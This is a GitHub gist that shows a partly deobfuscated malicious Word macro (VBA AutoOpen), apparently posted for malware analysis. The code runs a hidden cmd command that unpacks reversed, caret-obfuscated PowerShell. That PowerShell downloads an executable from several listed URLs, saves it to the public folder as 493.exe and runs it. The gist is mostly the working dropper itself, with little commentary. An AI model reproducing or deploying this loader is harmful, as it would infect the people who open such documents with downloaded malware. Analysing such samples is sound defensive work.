Skip to content

Instantly share code, notes, and snippets.

@spencerdodd
Created November 30, 2018 16:12
Show Gist options
  • Save spencerdodd/a1cbbfebf91bebf8b56ffb420241e3a2 to your computer and use it in GitHub Desktop.
Save spencerdodd/a1cbbfebf91bebf8b56ffb420241e3a2 to your computer and use it in GitHub Desktop.
almost fully deobfuscated autoopen
Sub AutoOpen()
Execute ("CM" + PayloadHalfOne + PayloadHalfTwo)
End Sub
Function PayloadHalfOne()
partOne = "d /V^:^ON/C""^s^e^t lN=^ ^ ^ ^ ^ ^ ^ ^ ^"
partTwo = " ^ ^ ^ ^ ^}^}^{^hc^t^ac^}^;^k^a^er^b^;^ir^j^$^ ^m^etI^-^e^k^ovn^I;)^ir^j^$^ ^,^fB^J^$(^e^l^"
partThree = "i^F^d^a^o^ln^wo^D^.^i^w^Y^$^{^yr^t^{)^B^Kj^$ n^i^ ^f^B^J^$(^hc^a^er^o^f;^'^e^x^e^.^'^+^U^t^L^$^+^'^\'"
partFour = "+c^i^l^b^u^p^:vne^$^=^ir^j^$^;^'⁴⁹³^'^ ^=^ ^U^t^"
partFive = "L^$^;)^'^@^'(^t^i^l^p^S^.^'^Q/^ur^.^en^g^i^s^e^dn^a^l^.n^a^m^i^d^.^w^w^w//^:^p^t^t^h@yn/^t^"
partSix = "i^.e^l^o^ic^s^iv^e^l^l^ed^on^i^dra^i^g^l^i//^:^p^t^t^h^@^g"
PayloadHalfOne = partOne + partTwo + partThree + partFour + partFive + partSix
End Function
Function PayloadHalfTwo()
partOne = "/^k^u.^oc^.^s^ec^ivr^e^s^k^e^p^sn^i//^:^p^t^t^h^@C/^m^oc^.^l^a^g^o^f^j//^:^p^"
partTwo = "t^t^h@^XC^s^U/^e^b^.^yn^a^j//^:^p^t^t^h^'^=^B^K^j^$^;^tn^e^i^lC^b"
partThree = "^e^W^.^t^eN^ ^tc^e^j^b^o^-^w^en^=^i^w^Y^$^ ^l^l^e^h^sr^e^w^o^p&&"
partFour = "^f^or /^L %^p ^in (349^;^-1^;0)^d^o ^s^e^t ^l^I=!^l^I!!lN:~%^p,1!&&^i^f %^p ^e"
partFive = "^q^u ^0 c^a^l^l %^l^I:^~^-350%"""
PayloadHalfTwo = partOne + partTwo + partThree + partFour + partFive
End Function
Function Execute(CommandString As String)
Const QrQBzLuD = 0
Shell# CommandString, QrQBzLuD
End Function
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment